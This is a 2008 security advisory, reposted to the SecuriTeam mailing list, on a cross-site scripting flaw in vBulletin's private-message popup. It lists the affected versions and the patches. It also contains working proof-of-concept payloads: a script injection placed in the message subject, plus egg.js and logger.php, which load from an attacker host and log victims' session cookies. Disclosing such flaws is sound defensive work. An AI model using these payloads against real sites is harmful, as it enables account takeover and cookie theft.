[UNIX] vBulletin Cross Site Scripting Vulnerability (popup)
SecuriTeam <[email protected]> 29 Aug 2008 11:11:08 +0200
| Newsgroups | gmane.comp.security.securiteam |
|---|---|
| Message-ID | <[email protected]> |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
vBulletin Cross Site Scripting Vulnerability (popup)
------------------------------------------------------------------------
SUMMARY
vBulletin [1] is a community forum solution for a wide range of users,
including industry leading companies. A XSS vulnerability has been
discovered that could allow an attacker to carry out an action
impersonating a legal user, or to obtain access to a user's account. This
flaw allows unauthorized disclosure and modification of information, and
it allows disruption of service.
DETAILS
Vulnerable Systems:
* vBulletin version 3.7.2 Patch Level 1.
* vBulletin 3.6.10 Patch Level 3.
Immune Systems:
* vBulletin version 3.7.2 Patch Level 2.
* vBulletin version 3.6.10 Patch Level 4.
Vendor Information, Solutions and Workarounds:
vBulletin team has released patches for this flaw (see [2]), and new fixed
versions of vBulletin (3.6.11 and 3.7.3) will be available on Tuesday,
August 26th. Refer to [3] for more details.
Technical Description / Proof of Concept Code:
This is a Cross Site Scripting (XSS) vulnerability within vBulletin
community forum solution. In order to exploit this flaw the following
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
/-----------
<!--
// script to show new private message popup
if (confirm("You have a new private message.\n\nSender:
[SENDER_USERNAME]\nTitle: '[PRIVATE_MESSAGE_TITLE]'\n\nClick OK to view
it, or cancel to hide this prompt."))
{
// Output when OK is clicked
if (confirm("Open the message in a new window?\n\n(Press cancel to
open in the current window.)"))
{
var winobj =
window.open("private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]", "pmnew",
"statusbar=yes,menubar=yes,scrollbars=yes,toolbar=yes,location=yes,directories=yes,resizable=yes,top=50,left=50");
if (winobj == null)
{
alert("Unable to open a new browser window,\n This
might be due to a 'popup blocker'");
}
}
else
{
window.location =
"private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]";
}
}
// end pm popup script
//-->
-----------/
The variable '$newpm[title]' in 'install/vbulletin-style.xml' was
previously de-sanitized in 'global.php' and only slash-escaping survives:
/-----------
//
#################################
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND
$vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND
!defined('NOPMPOPUP'))
{
$userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdm->set_existing($vbulletin->userinfo);
$userdm->set('pmpopup', 1);
$userdm->save(true, 'pmpopup'); // 'pmpopup' tells db_update to
issue a shutdownquery of the same name
unset($userdm);
if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
{
$newpm = $db->query_first("
SELECT pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");
$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] =
addslashes_js(unhtmlspecialchars($newpm['title'], true), '"');
$shownewpm = true;
}
}
-----------/
Which of course allows XSS attacks.
The 'alert' Proof of Concept (PoC) exploit would be to write a PM to the
user you want to attack with this subject:
/-----------
--></script><script>alert(/xss/.source)</script><!--
-----------/
The admin impersonification exploit PoC (Working on IE6 Only) would be:
/-----------
--></script><script src="http:"//attacker/vbStealer/egg.js></script><!--
-----------/
Where the 'egg.js' script file is:
/-----------
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://victim/vbStealer/logger.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();
-----------/
and the 'logger.php' script file:
/-----------
<?
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$all_cookies .= "$cookie_name=$cookie_value, ";
}
rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n",
FILE_APPEND);
?>
-----------/
Report Timeline:
2008-08-14: Core Security Technologies notifies the vBulletin team of the
vulnerability.
2008-08-14: The vBulletin team asks Core for a technical description of
the vulnerability.
2008-08-14: Technical details sent to vBulletin team by Core.
2008-08-15: vBulletin notifies Core that a fix has been produced and will
be available to the users on Monday, August 18th.
2008-08-18: vBulletin releases patches for this flaw to its customers.
2008-08-20: The advisory CORE-2008-0813 is published.
References:
[1] <http://www.vbulletin.com/> http://www.vbulletin.com/
[2] <http://members.vbulletin.com/patches.php>
http://members.vbulletin.com/patches.php
[3] <http://www.vbulletin.com/forum/showthread.php?t=282133>
http://www.vbulletin.com/forum/showthread.php?t=282133
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]>
CORE Security Technologies Advisories.
The original article can be found at:
<http://www.coresecurity.com/content/vbulletin-cross-site-scripting-vulnerability> http://www.coresecurity.com/content/vbulletin-cross-site-scripting-vulnerability
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.